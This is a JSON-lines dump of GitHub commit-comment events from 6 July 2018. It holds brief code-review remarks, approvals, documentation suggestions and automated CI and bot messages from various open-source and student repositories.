{"id":"7929972259","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"srandhaw/Slack-web-app"},"payload":{"comment":{"id":29623951,"position":null,"line":null,"path":null,"commit_id":"b1328262c99e08698f556b315ffcc5dbae2c9099","created_at":"2018-07-06T16:56:25Z","updated_at":"2018-07-06T16:56:25Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:56:25Z"}
{"id":"7929974188","type":"CommitCommentEvent","actor":{"login":"travis"},"repo":{"name":"isnullxbh/signals"},"payload":{"comment":{"id":29623955,"position":null,"line":null,"path":null,"commit_id":"e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae","created_at":"2018-07-06T16:56:52Z","updated_at":"2018-07-06T16:56:52Z","author_association":"NONE","body":"Wrong @travis!\n\nOn Thu, Jul 5, 2018 at 05:51 isnullxbh <notifications@github.com> wrote:\n\n> @chore @travis add build status\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/isnullxbh/signals/commit/e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae\n>\n"}},"created_at":"2018-07-06T16:56:52Z"}
{"id":"7929976058","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"StefanyGo/chatarang"},"payload":{"comment":{"id":29623957,"position":null,"line":null,"path":null,"commit_id":"be00e384b64047a971bdeb8fa55a785a1d73f9af","created_at":"2018-07-06T16:57:19Z","updated_at":"2018-07-06T16:57:19Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:57:19Z"}
{"id":"7929976604","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"StefanyGo/chatarang"},"payload":{"comment":{"id":29623960,"position":null,"line":null,"path":null,"commit_id":"9dee56bea233116ac7a9ab6e7510176cbd39c329","created_at":"2018-07-06T16:57:26Z","updated_at":"2018-07-06T16:57:26Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:57:26Z"}
{"id":"7929976704","type":"CommitCommentEvent","actor":{"login":"reachvishwa"},"repo":{"name":"harrypod/ape2018"},"payload":{"comment":{"id":29623963,"position":null,"line":null,"path":null,"commit_id":"a6e9965e4ccc19c2978142f6038f9c371770d3bc","created_at":"2018-07-06T16:57:28Z","updated_at":"2018-07-06T16:57:28Z","author_association":"NONE","body":"hi \r\nAre you guys able to access the link provided in the course assignment ? the link does not work for me , I get an \"Access denied\" message .\r\nhttps://ivanrmoore@bitbucket.org/ivanrmoore/book-club.git\r\n\r\n"}},"created_at":"2018-07-06T16:57:28Z"}
{"id":"7929977164","type":"CommitCommentEvent","actor":{"login":"tonykaralis"},"repo":{"name":"tonykaralis/MoodMovies"},"payload":{"comment":{"id":29623965,"position":null,"line":null,"path":null,"commit_id":"1b2d0c36b8980cd6c5a3c412e9f4d16e810646e7","created_at":"2018-07-06T16:57:34Z","updated_at":"2018-07-06T16:57:34Z","author_association":"OWNER","body":"Thanks this is a good catch. However if someone deletes the folder then there will be more problems later as well. All the movies stored in the db reference an image file which when loaded up later in watchlist or favourites will produce an error. "}},"created_at":"2018-07-06T16:57:34Z"}
{"id":"7929977859","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"StefanyGo/chatarang"},"payload":{"comment":{"id":29623969,"position":null,"line":null,"path":null,"commit_id":"bbe4bf20b26fce4b1fb6876156b1535e6e130ddd","created_at":"2018-07-06T16:57:43Z","updated_at":"2018-07-06T16:57:43Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:57:43Z"}
{"id":"7929978799","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"StefanyGo/chatarang"},"payload":{"comment":{"id":29623972,"position":null,"line":null,"path":null,"commit_id":"00f3a8ef1193e28ffa3439ba59195b57a8425b47","created_at":"2018-07-06T16:57:57Z","updated_at":"2018-07-06T16:57:57Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:57:57Z"}
{"id":"7929979913","type":"CommitCommentEvent","actor":{"login":"tonykaralis"},"repo":{"name":"tonykaralis/MoodMovies"},"payload":{"comment":{"id":29623975,"position":null,"line":null,"path":null,"commit_id":"1b2d0c36b8980cd6c5a3c412e9f4d16e810646e7","created_at":"2018-07-06T16:58:13Z","updated_at":"2018-07-06T16:58:13Z","author_association":"OWNER","body":"Probably will just have to catch that exception when it happens and handle it. "}},"created_at":"2018-07-06T16:58:13Z"}
{"id":"7929983479","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"andrewburkholder/chatarang"},"payload":{"comment":{"id":29623979,"position":null,"line":null,"path":null,"commit_id":"65e7f65919a6e5d0a20b55caf63d0ec0428cdcb8","created_at":"2018-07-06T16:59:00Z","updated_at":"2018-07-06T16:59:00Z","author_association":"NONE","body":"It's convention that the first word in a commit message begins with a capital letter. Otherwise, good messages!"}},"created_at":"2018-07-06T16:59:00Z"}
{"id":"7929984860","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"andrewburkholder/chatarang"},"payload":{"comment":{"id":29623984,"position":null,"line":null,"path":null,"commit_id":"2feb68eff264de80e33768c6c4273bdf6fbcd901","created_at":"2018-07-06T16:59:18Z","updated_at":"2018-07-06T16:59:18Z","author_association":"NONE","body":"Good attempt! 👍 "}},"created_at":"2018-07-06T16:59:18Z"}
{"id":"7929985907","type":"CommitCommentEvent","actor":{"login":"tonykaralis"},"repo":{"name":"tonykaralis/MoodMovies"},"payload":{"comment":{"id":29623986,"position":null,"line":null,"path":null,"commit_id":"1b2d0c36b8980cd6c5a3c412e9f4d16e810646e7","created_at":"2018-07-06T16:59:32Z","updated_at":"2018-07-06T16:59:32Z","author_association":"OWNER","body":"Actually I have a good solution for this. I'll add that fix and your fix later this weekend. "}},"created_at":"2018-07-06T16:59:32Z"}
{"id":"7929985932","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"andrewburkholder/chatarang"},"payload":{"comment":{"id":29623987,"position":null,"line":null,"path":null,"commit_id":"1cbfbdaf51ee9cb3c97c64ed2b8ae3ab894b31b4","created_at":"2018-07-06T16:59:33Z","updated_at":"2018-07-06T16:59:33Z","author_association":"NONE","body":"Good use of CSS in JS."}},"created_at":"2018-07-06T16:59:33Z"}
{"id":"7929986971","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"andrewburkholder/chatarang"},"payload":{"comment":{"id":29623990,"position":null,"line":null,"path":null,"commit_id":"4697c07714822b310b86f50be91d5b232ae3e07b","created_at":"2018-07-06T16:59:48Z","updated_at":"2018-07-06T16:59:48Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:59:48Z"}
{"id":"7930003067","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29624017,"position":null,"line":null,"path":null,"commit_id":"c38907683338f3dd4e6f34bc4359552549e5a787","created_at":"2018-07-06T17:03:21Z","updated_at":"2018-07-06T17:03:21Z","author_association":"COLLABORATOR","body":"Ну и как, заработало поле этого?"}},"created_at":"2018-07-06T17:03:21Z"}
{"id":"7930005932","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624023,"position":35,"line":1040,"path":"compiler/hsSyn/HsTypes.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:04:05Z","updated_at":"2018-07-06T17:04:05Z","author_association":"NONE","body":"Yes, because of levity polymorphism. (If you want to learn more -- but you really won't have to -- you can read the paper [here](http://repository.brynmawr.edu/cgi/viewcontent.cgi?article=1065&context=compsci_pubs))"}},"created_at":"2018-07-06T17:04:05Z"}
{"id":"7930011798","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29624035,"position":null,"line":null,"path":null,"commit_id":"0b78536e887db08afc1a3fe7a6c5d7daaf66b736","created_at":"2018-07-06T17:05:32Z","updated_at":"2018-07-06T17:05:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T17:05:32Z"}
{"id":"7930012032","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29624036,"position":null,"line":null,"path":null,"commit_id":"41da12e6bdc213c6aa331d59ee9a60a2a1103e57","created_at":"2018-07-06T17:05:35Z","updated_at":"2018-07-06T17:05:35Z","author_association":"COLLABORATOR","body":"I've not really heard of people evading the filter using other commands honestly. I only got requests to specifically change the !pick command. If I get complaints about other commands I will expand the functionality to all commands. Thanks for the ``this.canTalk(target)`` suggestion though, I will simplify the code."}},"created_at":"2018-07-06T17:05:35Z"}
{"id":"7930013308","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624038,"position":43,"line":1078,"path":"compiler/hsSyn/HsTypes.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:05:54Z","updated_at":"2018-07-06T17:05:54Z","author_association":"NONE","body":"This is wrong as is, but just remove the second return value."}},"created_at":"2018-07-06T17:05:54Z"}
{"id":"7930017308","type":"CommitCommentEvent","actor":{"login":"yufeldman"},"repo":{"name":"dremio/twill"},"payload":{"comment":{"id":29624052,"position":12,"line":831,"path":"pom.xml","commit_id":"d6d009a976016be33f9e2e351b1af78ea6761aa9","created_at":"2018-07-06T17:06:52Z","updated_at":"2018-07-06T17:06:52Z","author_association":"NONE","body":"got it. Going to revert this patch."}},"created_at":"2018-07-06T17:06:52Z"}
{"id":"7930018754","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624057,"position":532,"line":1201,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T17:07:14Z","updated_at":"2018-07-06T17:07:14Z","author_association":"CONTRIBUTOR","body":"Compiling a port, those options are presented in a menu when compiling a port.\r\n\"Compiling a port\" is redundant. \r\nThis section isn't very clear after the changes. I'd suggest something like:\r\nThe same default options are presented in a menu before compiling a port. The options can be changed to modify features or configure how the port is compiled.\r\n"}},"created_at":"2018-07-06T17:07:14Z"}
{"id":"7930025158","type":"CommitCommentEvent","actor":{"login":"beawlp"},"repo":{"name":"beawlp/TrainingRepo"},"payload":{"comment":{"id":29624065,"position":null,"line":null,"path":null,"commit_id":"223b686de7be969343fcc68bb11a3a0e9b8dc957","created_at":"2018-07-06T17:08:48Z","updated_at":"2018-07-06T17:08:48Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-06T17:08:48Z"}
{"id":"7930029790","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29624068,"position":null,"line":null,"path":null,"commit_id":"028ce3b64df2ce98fc08d331216aded984789d72","created_at":"2018-07-06T17:10:00Z","updated_at":"2018-07-06T17:10:00Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T17:10:00Z"}
{"id":"7930031785","type":"CommitCommentEvent","actor":{"login":"agodemar"},"repo":{"name":"Aircraft-Design-UniNa/jpad"},"payload":{"comment":{"id":29624070,"position":null,"line":null,"path":null,"commit_id":"f6832b3bac1d7a6ffcce474aa9006ce97c02c371","created_at":"2018-07-06T17:10:29Z","updated_at":"2018-07-06T17:10:29Z","author_association":"CONTRIBUTOR","body":"Names `DATCOM_FIRST_METHOD` and `DATCOM_SECOND_METHOD` are too generic. Change them into:\r\n\r\n`DATCOM_VMU_FIRST_METHOD` and `DATCOM_VMU_SECOND_METHOD`"}},"created_at":"2018-07-06T17:10:29Z"}
{"id":"7930031926","type":"CommitCommentEvent","actor":{"login":"ibennetch"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29624071,"position":null,"line":null,"path":null,"commit_id":"3d0b33b32fa10576012268c84e13bc0e3b7fc5a4","created_at":"2018-07-06T17:10:31Z","updated_at":"2018-07-06T17:10:31Z","author_association":"MEMBER","body":"@livemusicbangla I'm afraid I don't understand your comment, could you clarify?"}},"created_at":"2018-07-06T17:10:31Z"}
{"id":"7930037880","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"chil360/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29624078,"position":null,"line":null,"path":null,"commit_id":"82b937a6bcc19a20fb3f5bcfed8c62943eeb9f6d","created_at":"2018-07-06T17:11:59Z","updated_at":"2018-07-06T17:11:59Z","author_association":"NONE","body":"Isn't config_deviceHardwareKeys used to determine the configuration menu for hardware keys?"}},"created_at":"2018-07-06T17:11:59Z"}
{"id":"7930041673","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624085,"position":538,"line":1206,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T17:12:56Z","updated_at":"2018-07-06T17:12:56Z","author_association":"CONTRIBUTOR","body":"Are we still suggesting/advocating the use of portsnap? Last I knew portsnap is out of date and no longer recommended.\r\nAnyway, I'd suggest changing\r\n\"This command downloads the ports collection and extracts it to the :file:`/usr/ports/` directory of the jail:\"\r\nto\r\n\"This command will download and extract the ports collection to the :file:`/usr/ports/` directory of the jail:\"\r\nThis removes the use of it and clarifies a bit."}},"created_at":"2018-07-06T17:12:56Z"}
{"id":"7930046540","type":"CommitCommentEvent","actor":{"login":"vjimw"},"repo":{"name":"vjimw/social-core"},"payload":{"comment":{"id":29624092,"position":null,"line":null,"path":null,"commit_id":"7bf74d2101338244d4999c3d693cbedd6adf4c35","created_at":"2018-07-06T17:14:08Z","updated_at":"2018-07-06T17:14:08Z","author_association":"OWNER","body":"The first part catches the provider not found error. It literally just put the string \"google\" or \"facebook\" in the session. Since we only use those two this works fine. it also works without that string.\r\n\r\nThe second one is the bigger fix. For CC I updated the router so social auth and mycabin will go through the RW database by default. BUT I did not want toolbar and top nav calls to hit the RW database. I updated the MyCabin.get_user() call to default to the read-only connection, then fall back to RW when there is a delay. So new users will hit the RW until the sync catches up, but that should be a small number of users."}},"created_at":"2018-07-06T17:14:08Z"}
{"id":"7930048041","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624093,"position":544,"line":1226,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T17:14:28Z","updated_at":"2018-07-06T17:14:28Z","author_association":"CONTRIBUTOR","body":"remove the code-block in favor of using samp\r\n:samp:`make install clean`"}},"created_at":"2018-07-06T17:14:28Z"}
{"id":"7930057655","type":"CommitCommentEvent","actor":{"login":"Michalpos"},"repo":{"name":"Michalpos/web-pro1"},"payload":{"comment":{"id":29624120,"position":null,"line":null,"path":null,"commit_id":"e6de9400b14620a3ed81d26892185e628c2e5bc4","created_at":"2018-07-06T17:16:49Z","updated_at":"2018-07-06T17:16:49Z","author_association":"OWNER","body":"1st try from Codea..."}},"created_at":"2018-07-06T17:16:49Z"}
{"id":"7930066214","type":"CommitCommentEvent","actor":{"login":"wlongst"},"repo":{"name":"wlongst/wedding"},"payload":{"comment":{"id":29624143,"position":1,"line":1,"path":"CNAME","commit_id":"91176f595816df0318fae55c9c8ce75fbb62e621","created_at":"2018-07-06T17:18:57Z","updated_at":"2018-07-06T17:18:57Z","author_association":"OWNER","body":"www.williamandmelissa.net\r\nwilliamandmelissa.net"}},"created_at":"2018-07-06T17:18:57Z"}
{"id":"7930067363","type":"CommitCommentEvent","actor":{"login":"mohamedmansour"},"repo":{"name":"mohamedmansour/reload-all-tabs-extension"},"payload":{"comment":{"id":29624146,"position":null,"line":null,"path":null,"commit_id":"e404d55cfcba3a789e89d32af342626bac4af5df","created_at":"2018-07-06T17:19:15Z","updated_at":"2018-07-06T17:19:15Z","author_association":"OWNER","body":"#15 "}},"created_at":"2018-07-06T17:19:15Z"}
{"id":"7930070824","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624155,"position":566,"line":1247,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T17:20:06Z","updated_at":"2018-07-06T17:20:06Z","author_association":"CONTRIBUTOR","body":"change\r\nThe configuration screen will not be shown again. It can be redisplayed by typing :command:`make config`.  Change the settings, then rebuild with :command:`make clean install clean`.\r\nto something like\r\nThe configuration screen will not be shown again. To redisplay the configuration options reenter :command:`make config`.  The settings can be changed and the port rebuilt using :command:`make clean install clean`."}},"created_at":"2018-07-06T17:20:06Z"}
{"id":"7930071826","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624159,"position":13,"line":6,"path":"ruby_module_8/cargo_wagon.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:20:20Z","updated_at":"2018-07-06T17:20:20Z","author_association":"NONE","body":"перед сдачей закомментированный код убирай"}},"created_at":"2018-07-06T17:20:20Z"}
{"id":"7930073953","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624164,"position":63,"line":1098,"path":"compiler/hsSyn/HsTypes.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:20:51Z","updated_at":"2018-07-06T17:20:51Z","author_association":"NONE","body":"Style: turn this into a `go` function in the `where` clause of `splitHsAppTys`."}},"created_at":"2018-07-06T17:20:51Z"}
{"id":"7930075326","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29624167,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-06T17:21:11Z","updated_at":"2018-07-06T17:21:11Z","author_association":"MEMBER","body":"why? what was the bug?\r\n\r\n(write it in commit description next time)"}},"created_at":"2018-07-06T17:21:11Z"}
{"id":"7930076472","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29624171,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-06T17:21:29Z","updated_at":"2018-07-06T17:21:29Z","author_association":"OWNER","body":"Sorry for mis-using this little talk here, but:\r\nIs there any use for Midgard on the rk3328? I disabled it in the kernel config and now I can build with the latest ayufan-repo. This brings back the external SD-card on Z28pro. Obviously there is no need for the kernel patches 126-132 anymore.\r\n\r\nRegarding BT:\r\nYesterday I could \"talk\" to the chip via rtk_hciattach, so it seems possible. I could not transfer the firmware and config, so it dit not really work. BTW it is connect via ttyS2.\r\nBut today it doesn't \"work\" anymore and I have no clue why. That's the problem when you change multiple things in parallel ;)"}},"created_at":"2018-07-06T17:21:29Z"}
{"id":"7930077298","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624172,"position":24,"line":19,"path":"ruby_module_8/wagon.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:21:39Z","updated_at":"2018-07-06T17:21:39Z","author_association":"NONE","body":"а зечем первая проверка?\r\nпосмотри еще раз код классе ПассажирскийВагон и код здесь\r\nпервая проверка не нужна"}},"created_at":"2018-07-06T17:21:39Z"}
{"id":"7930077499","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624173,"position":4,"line":1299,"path":"compiler/typecheck/TcExpr.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:21:42Z","updated_at":"2018-07-06T17:21:42Z","author_association":"NONE","body":"Keep this comment!"}},"created_at":"2018-07-06T17:21:42Z"}
{"id":"7930079942","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624177,"position":12,"line":1308,"path":"compiler/typecheck/TcExpr.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:22:16Z","updated_at":"2018-07-06T17:22:16Z","author_association":"NONE","body":"No need to make a Haddock comment"}},"created_at":"2018-07-06T17:22:16Z"}
{"id":"7930080454","type":"CommitCommentEvent","actor":{"login":"turboladen"},"repo":{"name":"michaelkirk/rust-geo"},"payload":{"comment":{"id":29624178,"position":null,"line":null,"path":null,"commit_id":"f082fe8656bf9a0a1639d5b4d28f2e0f6df369ee","created_at":"2018-07-06T17:22:24Z","updated_at":"2018-07-06T17:22:24Z","author_association":"NONE","body":"Awesome!"}},"created_at":"2018-07-06T17:22:24Z"}
{"id":"7930081168","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624181,"position":27,"line":1324,"path":"compiler/typecheck/TcExpr.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:22:35Z","updated_at":"2018-07-06T17:22:35Z","author_association":"NONE","body":"Keep"}},"created_at":"2018-07-06T17:22:35Z"}
{"id":"7930081511","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624184,"position":35,"line":1335,"path":"compiler/typecheck/TcExpr.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:22:40Z","updated_at":"2018-07-06T17:22:40Z","author_association":"NONE","body":"Keep"}},"created_at":"2018-07-06T17:22:40Z"}
{"id":"7930081842","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624185,"position":39,"line":1339,"path":"compiler/typecheck/TcExpr.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:22:44Z","updated_at":"2018-07-06T17:22:44Z","author_association":"NONE","body":"Keep"}},"created_at":"2018-07-06T17:22:44Z"}
{"id":"7930082316","type":"CommitCommentEvent","actor":{"login":"chil360"},"repo":{"name":"chil360/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29624186,"position":null,"line":null,"path":null,"commit_id":"82b937a6bcc19a20fb3f5bcfed8c62943eeb9f6d","created_at":"2018-07-06T17:22:52Z","updated_at":"2018-07-06T17:22:52Z","author_association":"OWNER","body":"Yes, config_deviceHardwareKeys & config_deviceHardwareWakeKeys are required and are defined near the bottom of this file.\r\nThe code I removed in this commit is commented out and a duplicate."}},"created_at":"2018-07-06T17:22:52Z"}
{"id":"7930085883","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29624192,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T17:23:43Z","updated_at":"2018-07-06T17:23:43Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T17:23:43Z"}
{"id":"7930108697","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29624239,"position":38,"line":2369,"path":"FHEM/00_SIGNALduino.pm","commit_id":"d4694ed2d9ad75a361bc5c70e30238e5040433de","created_at":"2018-07-06T17:29:17Z","updated_at":"2018-07-06T17:29:17Z","author_association":"CONTRIBUTOR","body":"Ein \"last\" müsste hier besser passen"}},"created_at":"2018-07-06T17:29:17Z"}
{"id":"7930109783","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29624241,"position":null,"line":null,"path":null,"commit_id":"ec7391880017915f50b1a83a6e47ec5c8c9a1732","created_at":"2018-07-06T17:29:32Z","updated_at":"2018-07-06T17:29:32Z","author_association":"OWNER","body":"Fixes issue #20 "}},"created_at":"2018-07-06T17:29:32Z"}
{"id":"7930110787","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29624244,"position":null,"line":null,"path":null,"commit_id":"ec7391880017915f50b1a83a6e47ec5c8c9a1732","created_at":"2018-07-06T17:29:46Z","updated_at":"2018-07-06T17:29:46Z","author_association":"OWNER","body":"Also added html for the distances "}},"created_at":"2018-07-06T17:29:46Z"}
{"id":"7930111100","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"chil360/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29624246,"position":null,"line":null,"path":null,"commit_id":"82b937a6bcc19a20fb3f5bcfed8c62943eeb9f6d","created_at":"2018-07-06T17:29:50Z","updated_at":"2018-07-06T17:29:50Z","author_association":"NONE","body":"Oh. My bad then"}},"created_at":"2018-07-06T17:29:50Z"}
{"id":"7930114727","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624254,"position":70,"line":953,"path":"compiler/typecheck/TcHsType.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:30:42Z","updated_at":"2018-07-06T17:30:42Z","author_association":"NONE","body":"Change to kind mode using `kindLevel :: TcTyMode -> TcTyMode`"}},"created_at":"2018-07-06T17:30:42Z"}
{"id":"7930117925","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29624261,"position":null,"line":null,"path":null,"commit_id":"c38907683338f3dd4e6f34bc4359552549e5a787","created_at":"2018-07-06T17:31:29Z","updated_at":"2018-07-06T17:31:29Z","author_association":"OWNER","body":"Так устроен модуль AFIO в серии 1хх. А как в 4хх?"}},"created_at":"2018-07-06T17:31:29Z"}
{"id":"7930119992","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29624268,"position":null,"line":null,"path":null,"commit_id":"c38907683338f3dd4e6f34bc4359552549e5a787","created_at":"2018-07-06T17:31:59Z","updated_at":"2018-07-06T17:31:59Z","author_association":"OWNER","body":"В общем все равно каряво выглядит, поэтому смотрите следующий коммит"}},"created_at":"2018-07-06T17:31:59Z"}
{"id":"7930120590","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pygeoif-feedstock"},"payload":{"comment":{"id":29624270,"position":null,"line":null,"path":null,"commit_id":"cb4fc8f04bb4bad7fd4f9f7943813ca7403495d0","created_at":"2018-07-06T17:32:09Z","updated_at":"2018-07-06T17:32:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @benjwadams, @lukecampbell were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @benjwadams, @lukecampbell were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T17:32:09Z"}
